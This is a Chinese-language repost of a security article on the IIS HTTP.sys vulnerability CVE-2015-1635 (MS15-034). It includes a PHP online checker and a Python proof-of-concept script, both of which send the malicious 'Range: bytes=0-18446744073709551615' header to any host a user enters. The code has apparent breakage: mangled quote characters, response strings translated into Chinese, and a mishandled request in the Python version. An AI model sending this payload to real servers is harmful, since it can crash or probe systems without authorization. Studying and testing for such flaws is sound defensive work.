IIS最新高危漏洞POC及在線檢測源碼
作者:xiaoya
遠程執行代碼漏洞存在于 HTTP 協議堆棧 (HTTP.sys) 中,當 HTTP.sys 未正確分析經特殊設計的 HTTP 請求時會導致此漏洞。成功利用此漏洞的攻擊者可以在系統帳戶的上下文中執行任意代碼。
HTTP.sys遠程執行代碼漏洞(CVE-2015-1635,MS15-034)
遠程執行代碼漏洞存在于 HTTP 協議堆棧 (HTTP.sys) 中,當 HTTP.sys 未正確分析經特殊設計的 HTTP 請求時會導致此漏洞。成功利用此漏洞的攻擊者可以在系統帳戶的上下文中執行任意代碼。https://technet.microsoft.com/zh-cn/library/security/MS15-034
在線檢測源碼
- <?php
- class VulnStatus
- {
- const FAIL = 0;
- const VULN = 1;
- const VULN_NOT_MS = 2;
- const PATCHED = 3;
- const NOT_VULN = 4;
- const NOT_VULN_MS = 5;
- const NOT_VULN_CF = 6;
- public static function AsString( $status, $host )
- {
- switch( $status )
- {
- case self::FAIL : return ';<div class="alert alert-warning">無法連接到 <b>'; . $host . ';</b> 測試漏洞。</div>';;
- case self::VULN : return ';<div class="alert alert-danger"><b>'; . $host . ';</b> 存在漏洞。</div>';;
- case self::VULN_NOT_MS: return ';<div class="alert alert-warning"><b>'; . $host . ';</b> 可能存在漏洞,但它好像沒使用IIS。</div>';;
- case self::PATCHED : return ';<div class="alert alert-success"><b>'; . $host . ';</b> 已修復。</div>';;
- case self::NOT_VULN : return ';<div class="alert alert-info">不能識別補丁狀態 <b>'; . $host . ';</b>, 并沒有使用IIS,可能不存在漏洞。</div>';;
- case self::NOT_VULN_MS: return ';<div class="alert alert-info">不能識別補丁狀態 <b>'; . $host . ';</b>. 可能不存在漏洞。</div>';;
- case self::NOT_VULN_CF: return ';<div class="alert alert-success"><b>'; . $host . ';</b> 可能使用了CloudFlare CDN加速,導致漏洞無法檢測或不存在。</div>';;
- }
- return ';好像壞了';;
- }
- }
- $host = false;
- $status = false;
- $url = filter_input( INPUT_GET, ';host';, FILTER_SANITIZE_URL );
- if( !empty( $url ) && parse_url( $url, PHP_URL_SCHEME ) === null )
- {
- $url = ';http://'; . $url;
- }
- $port = parse_url( $url, PHP_URL_PORT );
- if( $port === null )
- {
- $port = 80;
- }
- $url = parse_url( $url, PHP_URL_HOST );
- if( $url !== null )
- {
- $cachekey = ';ms15034_'; . $url . ';_'; . $port;
- $cachetime = 300; // 5 minutes
- $host = htmlspecialchars( $url, ENT_HTML5 );
- if( $port !== 80 )
- {
- $host .= ';:'; . $port;
- }
- $memcached = new Memcached( );
- $memcached->addServer( ';/var/run/memcached/memcached.sock';, 0 );
- $status = $memcached->get( $cachekey );
- if( $status === false )
- {
- $fp = @fsockopen( $url, $port, $errno, $errstr, 5 );
- if( $fp === false )
- {
- $status = VulnStatus::FAIL;
- }
- else
- {
- stream_set_timeout( $fp, 5 );
- $header = "GET / HTTP/1.1\r\n";
- $header .= "Host: stuff\r\n";
- $header .= "Range: bytes=0-18446744073709551615\r\n";
- $header .= "Connection: close\r\n\r\n";
- fwrite( $fp, $header );
- $response = fread( $fp, 1024 );
- fclose( $fp );
- if( strpos( $response, ';您的請求范圍不符合'; ) !== false )
- {
- $status = strpos( $response, ';Microsoft'; ) === false ? VulnStatus::VULN_NOT_MS : VulnStatus::VULN;
- }
- else if( strpos( $response, ';請求一個無效的header頭部'; ) !== false )
- {
- $cachetime = 3600; // 緩存時間
- $status = VulnStatus::PATCHED;
- }
- else if( strpos( $response, ';Microsoft'; ) === false )
- {
- if( strpos( $response, ';403 Forbidden'; ) !== false && strpos( $response, ';cloudflare-nginx'; ) !== false )
- {
- $status = VulnStatus::NOT_VULN_CF;
- }
- else
- {
- $status = VulnStatus::NOT_VULN;
- }
- }
- else
- {
- $status = VulnStatus::NOT_VULN_MS;
- }
- }
- unset( $fp, $header, $response );
- $memcached->set( $cachekey, $status, $cachetime );
- }
- $status = VulnStatus::AsString( $status, $host );
- }
- ?>
- <!DOCTYPE HTML>
- <html>
- <head>
- <meta charset="utf-8">
- <meta name="theme-color" content="#424242">
- <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
- <meta name="viewport" content="width=device-width, initial-scale=1.0">
- <title>MS15-034 測試</title>
- <link href="//maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css" rel="stylesheet">
- <style type="text/css">
- .container {
- max-width: 900px;
- }
- .masthead {
- position: relative;
- padding: 20px 0;
- text-align: center;
- color: #fff;
- background-color: #424242;
- margin-bottom: 20px;
- }
- .masthead a {
- color: #fff;
- }
- .footer {
- text-align: center;
- padding: 15px;
- color: #555;
- }
- .footer span {
- color: #FA5994;
- }
- .form-inline {
- text-align: center;
- margin-bottom: 20px;
- }
- .github {
- position: absolute;
- top: 0;
- right: 0;
- }
- </style>
- </head>
- <body>
- <div>
- <div>
- <h1>HTTP.sys 堆棧漏洞測試</h1>
- <h3>輸入一個URL或主機名來測試服務器的 <a href="https://technet.microsoft.com/en-us/library/security/ms15-034.aspx" target="_blank">MS15-034</a> / <a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635" target="_blank">CVE-2015-1635</a>.</h3>
- </div>
- </div>
- <div>
- <blockquote>
- <p>在HTTP協議棧(HTTP.sys)造成當HTTP協議堆棧不正確地分析特制的HTTP請求的遠程代碼執行漏洞。成功利用此漏洞誰的攻擊者可以在系統帳戶的上下文中執行任意代碼。</p>
- <p>要利用此漏洞,攻擊者必須發送一個特制的HTTP請求發送到受影響的系統。此更新通過修改Windows HTTP協議棧處理請求解決該漏洞。</p>
- </blockquote>
- <form id="js-form" method="GET">
- <div>
- <input type="text" class="form-control input-lg" id="js-input" placeholder="baidu.com" name="host" autofocus<?php if( $host !== false ) { echo '; value="'; . $host . ';"';; } ?>>
- <button type="submit" class="btn btn-primary btn-lg">檢測</button>
- </div>
- </form>
- <?php if( $status !== false ) { echo $status; } ?>
- <div>使用Memcached分布式內存對象緩存系統 | 所有的結果查詢會被緩存五分鐘</div>
- </div>
- </body>
- </html>
漏洞驗證POC
python版
- #!/usr/bin/env python
- __author__ = ';jastra';
- class bg_colors:
- VULN = ';33[92m';
- NONVULN= ';33[95m';
- EXPLOIT = ';33[91m';
- try:
- import requests
- import re
- except ImportError as ierr:
- print(bg_colors.EXPLOIT + "Error, looks like you don';t have %s installed", ierr)
- def identify_iis(domain):
- req = requests.get(str(domain))
- remote_server = req.headers[';server';]
- if "Microsoft-IIS" in remote_server:
- print(bg_colors.VULN + "[+] 服務是 " + remote_server)
- ms15_034_test(str(domain))
- else:
- print(bg_colors.NONVULN + "[-] 不是IIS\n可能是: " + remote_server)
- def ms15_034_test(domain):
- print(" 啟動vuln檢查!")
- vuln_buffer = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";
- req = requests.get(str(domain), params=vuln_buffer)
- if req.headers[';content';] == "請求范圍不符合":
- print(bg_colors.EXPLOIT + "[+] 存在漏洞")
- else:
- print(bg_colors.EXPLOIT + "[-] IIS服務無法顯示漏洞是否存在. "+
- "需要手動檢測")
- usr_domain = raw_input("輸入域名掃描: ")
- identify_iis(usr_domain)
責任編輯:藍雨淚
來源:
FreeBuf
